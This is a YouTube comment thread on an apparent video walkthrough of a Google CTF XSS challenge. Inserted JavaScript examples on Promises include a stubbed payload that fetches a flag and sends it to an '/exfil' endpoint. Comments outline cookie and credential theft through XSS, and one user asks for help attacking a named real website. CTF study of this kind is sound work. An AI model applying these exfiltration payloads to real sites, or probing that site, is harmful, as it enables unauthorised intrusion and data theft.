Overflow is gaining such a deep understanding of computers that he's becoming one. How long before he can't beat recapcha
"Or whatever, so no clue. But in the end, still solved it. Who cares."
Every coder ever.
Today I found a vulnerability in my job's codebase. Essentially arbitrary file deletion. Patched that real quick.
I like to think your videos gave me the thinking patterns needed to be able to spot this vulnerability. Thank you!
Give some more details please :)
@@Lolo5 hmmm, no sorry :)
@@TheGrimravager what was the type of vulnerability, if you want to tell that.
@@ScorpioneOrzion essentially arbitrary file deletion due to a non-sanitized call to PHP's unlink() function. But luckily most files were not writable by the user that would execute the PHP script.
Nice
1:15 -> I think you did a bunch of those captchas wrong.
When it says it wants the traffic lights, you selected the poles as well.
That feeling when the captcha thinks motorcycles and bicycles are the same thing.
That's because the poles have traffic lights on them
It's google using the CTF players as free workers. If you want the flag work 5 min for us :D
Konrad W correct
He's a robot.
Your usage of Promises is ... interesting ...
The purpose of Promises is exactly to avoid the nesting you are doing and that you would usually get when using callbacks.
You can just do this:
fetch("/flag").then(r => r.text()).then(t => fetch(...))
I think modern Chrome supports `await` in the console too.
@@akuviljanen4695 Only in an async function, as the exploit is not run in the console.
Fortunately it's easy to wrap everything into an async lambda
Very good info.
Lol, I did that too before learning how promises work.
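The three styles discussed in this thread side by side, as an added example that is not code from the video: the nested `.then()` pyramid, the flat chain where each `.then()` returns the next Promise, and the `async`/`await` form that a payload has to wrap in an async function. `fetch` is replaced by a constructed in-memory stub (`fakeFetch`, with made-up paths and a made-up flag value) so the file runs offline; the second request is the "send it somewhere" step an XSS payload would do.

```javascript
// Added example, not from the video. `fakeFetch` is a constructed stand-in for
// the browser's fetch(): it returns a Promise of a Response-like object whose
// text() also returns a Promise, exactly the shape the real API has.
const fakeServer = {
  "/flag": "CTF{example-flag}",            // constructed value, not a real flag
  "/exfil?d=CTF%7Bexample-flag%7D": "ok",  // constructed "attacker endpoint"
};

function fakeFetch(url) {
  return new Promise((resolve, reject) => {
    if (!(url in fakeServer)) return reject(new Error("404 " + url));
    resolve({ status: 200, text: () => Promise.resolve(fakeServer[url]) });
  });
}

// 1. Nested .then(): works, but every dependent step indents one level deeper
//    and errors have to be caught at each level separately.
function nested(fetchFn) {
  return fetchFn("/flag").then(r => {
    return r.text().then(t => {
      return fetchFn("/exfil?d=" + encodeURIComponent(t)).then(r2 => {
        return r2.text();
      });
    });
  });
}

// 2. Flat chain: returning a Promise from a .then() callback makes the next
//    .then() wait for it, so the whole sequence stays at one indentation level.
//    `r` is the Response, `t` is its body text.
function chained(fetchFn) {
  return fetchFn("/flag")
    .then(r => r.text())
    .then(t => fetchFn("/exfil?d=" + encodeURIComponent(t)))
    .then(r2 => r2.text());
}

// 3. async/await: same sequencing, reads like synchronous code. Top-level
//    await only works in the DevTools console (and ES modules); inside an
//    injected <script> payload it has to live in an async function.
async function awaited(fetchFn) {
  const r = await fetchFn("/flag");
  const t = await r.text();
  const r2 = await fetchFn("/exfil?d=" + encodeURIComponent(t));
  return r2.text();
}

// One .catch() at the end of a chain sees a failure from any step.
function chainedSafe(fetchFn) {
  return chained(fetchFn).catch(err => "failed: " + err.message);
}

// Async IIFE: the wrapper a payload needs when `await` is used outside the console.
(async () => {
  console.log(await nested(fakeFetch));                         // ok
  console.log(await chained(fakeFetch));                        // ok
  console.log(await awaited(fakeFetch));                        // ok
  console.log(await chainedSafe(() => fakeFetch("/missing")));  // failed: 404 /missing
})();
```

All three return the same value; the difference is only readability and where errors are caught. Swapping `fakeFetch` for the real `fetch` gives the pattern from the thread unchanged.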
The endless reCaptcha looks about normal for when I use Tor.
Underrated comment..
ya lol, that's why I don't use it
I recently started to learn some Web Application pen-testing, and a lot of the things here finally made sense for me, thank you for your detailed explanation.
Bro, I have been eagerly waiting for this for a week...
As a newbie, I wanted the walkthrough.
Thank you so much bro
I think people with extensive knowledge about client-side would understand this haha
Imagine being on the other end of this... You open up a ticket from a user and suddenly two little embedded windows open and your password is leaked
Great stuff, didn't know self-XSS was exploitable in this way!
Me neither! This is very good to know
Testing for XSS in all fields of my page RN 😅
1:30 that's a lot of dedication
those nested Promise#then calls cause me pain 😶
🤯🤯🤯... watching this for the 5th time
You see, from doing CTFs and watching videos I was able to follow. I was like, wow, I really learned a lot, I can follow this. Until about 6 minutes, then I was like -_- what?
Where can I learn this stuff????
Try using promises... that's what I thought when I saw timeouts...
If you want to get through captchas faster, only check 3 boxes. No more, no less.
Awesome video, thanks!
Hi, can you do a video writeup for the mathsh challenge from GoogleCTF? I am searching for a writeup of that challenge since the end of the CTF. I worked on that challenge for many hours but couldn't clear it, and I would just want to know if I was on the right track.
In your XSS when you have typed "fetch('/flag').then( r => { ....." What is "r"? Is it the "response" of the fetch request?
idk much JavaScript, but probably r is a custom function, and so is t
Of course, it is the actual response if no error occurred in the (hopefully present) ".catch(err => { /** **/ })" function.
developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch
@@malloc8634 nice
Could you get us deeper into SDR? Would be great!
that captcha tho...😅
Wow, amazing video, I love it, but I understand better in the Hindi language.
PWN challenges please!!!
Have you played the CSAW? I saw team ALLES, it's yours, right? How did it go?
Hello brother, can I ask you some questions?
You said you're using Linux in Docker. How do you set up Linux in Docker to get the external IP?
google is your friend
13:39, 2 seconds too long :'(
He should have sped up the intro just to make it fit.
Do you think that with the passage of time, the systems will be more secure and hacking will be almost impossible (or unnecessary)?
No
Come on... Next
Gibe me Next video LiverFlow!!!
If anyone has tried using CSRF, it does not work because the admin cannot change his address. Only normal users can. So you have to use some technique like preload, as this man did. Or just check document.referrer.
Is there a CTF for beginners? Or something like that?
Take a look at PicoCTF
Do you like John Hammond?
Hi, I'm pretty new to hacking and I wanted to try to find a vuln in iitianspace.com/login.php, please help.
I passed the captcha in 2 trials lol😂
1:00 Wait a second how is there a traffic light in the last box he clicks? I would have failed that captcha...
edit: nvm, it was him who failed the captchas lol
Are you sure that setTimeout actually does anything? I've run into issues before when trying to use setTimeout to control a data flow - it's still all executed instantly and doesn't work the same way as async/await/promise.
setTimeout, at least in my experience, works, but he should've used async/await or promises in this case.
If you have some doubts or think you need some more insight on setTimeout, I suggest you search on YouTube for "What the heck is the event loop anyway?". It's a video of around 26 minutes which gives a good insight into the event loop and how setTimeout is sometimes used in the wrong way. Hope this helps.
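What the event loop does with `setTimeout` versus Promise callbacks, and why a loop of timeouts feels like it "executes instantly", as an added example that is not code from the video. The step names and delays are constructed; `sleep` is the usual Promise wrapper around `setTimeout` and not a built-in.

```javascript
// Added example, not from the video. Shows the ordering the event loop
// actually produces and the difference between scheduling timers and
// awaiting them.

// Records the order in which code runs: synchronous code first, then the
// microtask queue (Promise callbacks), then the macrotask queue (timers),
// even for setTimeout(..., 0).
function runOrder() {
  const log = [];
  return new Promise(resolve => {
    log.push("sync 1");
    setTimeout(() => log.push("timeout 0ms"), 0);         // macrotask
    Promise.resolve().then(() => log.push("microtask"));  // microtask
    log.push("sync 2");
    // Queued after the first timer, so it fires last and reports the result.
    setTimeout(() => resolve(log), 0);
  });
}

// Promise wrapper around setTimeout: the only way to make `await` wait for a timer.
const sleep = ms => new Promise(resolve => setTimeout(resolve, ms));

// Pitfall: scheduling steps in a loop without awaiting. Every timer is created
// immediately with the same delay, the loop finishes at once, and the
// callbacks later fire back to back rather than one after another.
function loopWithoutAwait(steps, ms) {
  const started = [];
  for (const s of steps) {
    setTimeout(() => started.push(s), ms);
  }
  return started; // still empty here: nothing has fired yet
}

// Fix: await a sleep (or the real Promise of the work, e.g. a fetch) inside
// the loop, so each step starts only after the previous one.
async function loopWithAwait(steps, ms) {
  const started = [];
  for (const s of steps) {
    await sleep(ms);
    started.push(s);
  }
  return started;
}

// Staggered delays (ms, 2*ms, 3*ms, ...) also sequence the steps, which is the
// timer-only approach. Each delay has to be guessed large enough for the
// previous step to finish; awaiting the real Promise needs no guessing.
function loopStaggered(steps, ms) {
  return new Promise(resolve => {
    const started = [];
    steps.forEach((s, i) => setTimeout(() => started.push(s), ms * (i + 1)));
    setTimeout(() => resolve(started), ms * (steps.length + 1));
  });
}

(async () => {
  console.log(await runOrder());                          // sync 1, sync 2, microtask, timeout 0ms
  console.log(loopWithoutAwait(["a", "b", "c"], 10));     // []
  console.log(await loopWithAwait(["a", "b", "c"], 10));  // a, b, c
  console.log(await loopStaggered(["a", "b", "c"], 10));  // a, b, c
})();
```

`setTimeout` does do something: it defers the callback to a later turn of the event loop. It just never blocks the code that called it, so a data flow that depends on ordering has to be expressed with Promises or `await`, or with explicitly staggered delays.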
Why don't you use Firefox?
Why don’t you use Chrome?
@@LiveOverflow it eats RAM (and is slower than Firefox on my PC)
@@zsin128 lol, you're out here fighting about browsers, while I'm out here curling the page and imagining what it looks like in my head
P.S. I do not recommend that, not fun
Chrome has more and better tools for hacking and programming.
Managarmr is so awkward to pronounce 😂😂😂😂
Manager Mr
Should be smoother if it’s your teammate tho?
Less Smoked Leet Chicken
When I read the flag name, I sometimes think I could have guessed that.
That's great except for the no-brute-forcing-flags condition in CTFs :)
2:23 learn how to use promises man
There is also a solution where you find the username/password in document.referrer.
github.com/weibell/ctf-google2020/tree/master/tech-support
🧐👍🤝🤜👌
Jesus Christ, where does one even begin to solve that?
Team pasten wants to know your location
Funny, I solved this guy using the referrer. I guess it was not intended solution
Do you have a write up (or short explanation) of your solution? I'm very interested in it
I wish I had that knowledge 😑
*captcha lol*
WOW im early. 4 min ago
wtf is that captcha lmfao
wish I could understand this .
"who cares" in a nutshell in this video...XD
wha?
i don't understand anything
The short version:
The tech support app has a bug in it that allows you to post content that will be parsed as JavaScript. This is a major security vulnerability known as XSS.
The point of the challenge is to get the Google bot to leak its cookie by having it trigger your injected malicious JavaScript code.
But you can't simply grab the cookie and send it back to you because the CORS check will block it. So the solution is that you have to do all kinds of acrobatics with your JavaScript code and a second XSS to walk the Google bot around the site and log in and out on different sessions.
Understandable. I had to watch it 3 times to understand it